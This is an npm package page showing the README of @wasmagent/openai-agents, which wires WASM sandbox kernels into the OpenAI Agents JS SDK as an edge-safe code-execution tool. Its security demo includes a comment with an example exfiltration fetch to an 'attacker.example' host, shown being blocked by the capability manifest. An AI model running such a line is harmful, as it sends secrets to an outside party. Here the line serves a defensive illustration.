npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@wasmagent/openai-agents

v1.0.3

Published

Drop wasmagent sandbox kernels into the OpenAI Agents JS SDK as a Tool — edge-safe code execution with one capability manifest, no E2B sandbox needed

Downloads

104

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

tellerlintellerlin

Keywords

openaiagentsagentsandboxcode-executiontoolwasmagent

Readme

/openai-agents

Drop wasmagent sandbox kernels into the OpenAI Agents JS SDK as a native tool. Edge-safe code execution, one capability manifest, runs on Cloudflare Workers / Vercel Edge / Node — no E2B sandbox required.

Open in StackBlitz

Why this exists

The 2026-04 OpenAI Agents JS release introduced a first-party SandboxAgent with Unix-local, Docker, and hosted-container execution clients. That covers the case where a host process is available and you want OS-level isolation. It does not cover:

  • Cloudflare Workers / Vercel Edge / browser tabs (no host process for Unix-local; Docker isn't a thing on the edge).
  • Air-gapped / offline deployments where reaching a hosted container is not allowed.
  • Workloads where 50 ms is too long for cold start and per-second container billing dominates the cost.

The wasmagent kernels live below the OS line — QuickJS-in-WASM, Pyodide-in-WASM, or Wasmtime — so they run wherever JS runs. This package binds them to the Agents JS Tool shape.

Before / After

Replacing the OpenAI built-in code_interpreter tool with a wasmagent WASM kernel:

 const agent = new Agent({
   name: "math-helper",
   tools: [
-    { type: "code_interpreter" },   // ← hosted, no edge support, per-session billing
+    sandboxedJsAgentTool({ kernel: new QuickJSKernel() }),
+    // ↑ in-process, edge-safe, $0/call, full CapabilityManifest
   ],
 });

Full before/after:

+import { sandboxedJsAgentTool } from "@wasmagent/openai-agents";
+import { QuickJSKernel } from "@wasmagent/kernel-quickjs";

 const agent = new Agent({
   name: "math-helper",
   tools: [
-    { type: "code_interpreter" },
+    sandboxedJsAgentTool({
+      kernel: new QuickJSKernel(),
+      capabilities: { allowedHosts: [] },
+    }),
   ],
 });

Install

npm install @openai/agents /openai-agents /kernel-quickjs \
  quickjs-emscripten @jitl/quickjs-wasmfile-release-sync zod

One-shot snippet evaluation

import { Agent } from "@openai/agents";
import { sandboxedJsAgentTool } from "/openai-agents";
import { QuickJSKernel } from "/kernel-quickjs";

const agent = new Agent({
  name: "math-helper",
  tools: [
    sandboxedJsAgentTool({
      kernel: new QuickJSKernel(),
      capabilities: { cpuMs: 5000 },
    }),
  ],
});

Code-mode: collapse N tools

import { codeModeAgentTool } from "/openai-agents";
import { ToolRegistry } from "/core";

const tools = new ToolRegistry();
// …register downstream tools…

const portalTool = codeModeAgentTool({
  kernel: new QuickJSKernel(),
  tools,
  capabilities: { allowedHosts: ["api.example.com"] },
});

const agent = new Agent({ name: "ops", tools: [portalTool] });
// Model sees ONE tool; in-sandbox scripts call N tools via callTool(...).

Kernel selection — pick the right tier

sandboxedJsAgentTool() and codeModeAgentTool() accept any wasmagent kernel. The choice is independent of the SDK adapter — swap kernels in one line, the rest of your code is unchanged:

| Kernel | When to pick it | Edge-safe | | ------ | --------------- | --------- | | QuickJSKernel (/kernel-quickjs) | Default. JS/TS workloads. ~2 MB cold start. | ✅ | | PyodideKernel (/kernel-pyodide) | Model emits Python (numpy, pandas, regex-heavy). | ✅ (heavy) | | WasmtimeKernel (/kernel-wasmtime) | Multi-language WASM modules / Javy-compiled JS for max isolation. | ✅ | | RemoteSandboxKernel (/kernel-remote) | Need full POSIX, native binaries, multi-tenant trust. Backed by E2B / Cloudflare Sandbox. | n/a |

Swap is a one-liner — kernel: new QuickJSKernel() becomes kernel: new PyodideKernel(). Same CapabilityManifest, same OpenAI Agents JS Tool<T> shape.

Security demo

CapabilityManifest enforces network and filesystem policy at the kernel boundary — the model cannot escape it regardless of what code it generates:

import { sandboxedJsAgentTool } from "@wasmagent/openai-agents";
import { QuickJSKernel } from "@wasmagent/kernel-quickjs";

const kernel = new QuickJSKernel();
const tool = sandboxedJsAgentTool({
  kernel,
  capabilities: {
    allowedHosts: [],           // no outbound network
    allowedPaths: [],           // no filesystem access
    cpuMs: 5_000,
    memoryLimitBytes: 64 * 1024 * 1024,
  },
});

// Model-generated code that tries to exfiltrate data:
// fetch("https://attacker.example/exfil?data=secret")
// → throws: network access denied — host "attacker.example" not in allowedHosts

The same manifest applies to both sandboxedJsAgentTool and codeModeAgentTool.

Capability manifest

Same CapabilityManifest as the other adapters — see docs/guides/code-mode.md.

When to pick this over SandboxAgent

| Need | OpenAI SandboxAgent | /openai-agents | |---|---|---| | Cloudflare Workers / Vercel Edge | ❌ requires host process | ✅ WASM kernel runs in-isolate | | Native binaries / full POSIX | ✅ Docker / hosted | ❌ language-level only | | Cold start | ~200–800 ms (container) | ~50 ms (WASM) | | Cost per call | per-second container billing | $0 (in-process) | | Offline / air-gapped | ❌ | ✅ |

Use both: SandboxAgent for "I need bash + git", codeModeAgentTool for "the model wants to do math / parse JSON / chain tool calls".

See also